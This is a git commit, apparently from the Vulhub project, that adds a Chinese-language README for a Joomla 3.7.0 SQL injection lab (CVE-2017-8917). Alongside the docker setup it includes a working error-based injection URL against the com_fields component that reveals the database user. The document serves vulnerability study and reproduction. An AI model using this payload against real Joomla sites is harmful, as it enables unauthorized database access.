first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
26
joomla/CVE-2017-8917/README.zh-cn.md
Normal file
26
joomla/CVE-2017-8917/README.zh-cn.md
Normal file
@@ -0,0 +1,26 @@
|
||||
# Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
|
||||
|
||||
Joomla是一个开源免费的内容管理系统(CMS),基于PHP开发。
|
||||
|
||||
Joomla在3.7.0中新引入的一个组件“com_fields”,这个组件任何人都可以访问,无需登陆验证。com_fields组件由于对请求数据过滤不严导致了SQL注入。
|
||||
|
||||
参考链接:
|
||||
|
||||
- <https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html>
|
||||
- <https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html>
|
||||
|
||||
## 测试环境
|
||||
|
||||
执行如下命令启动一个Joomla 3.7.0服务:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
启动后访问`http://your-ip:8080`即可看到Joomla的安装界面和测试数据。
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
直接访问`http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)`,即可看到SQL报错信息:
|
||||
|
||||
|
||||
Reference in New Issue
Block a user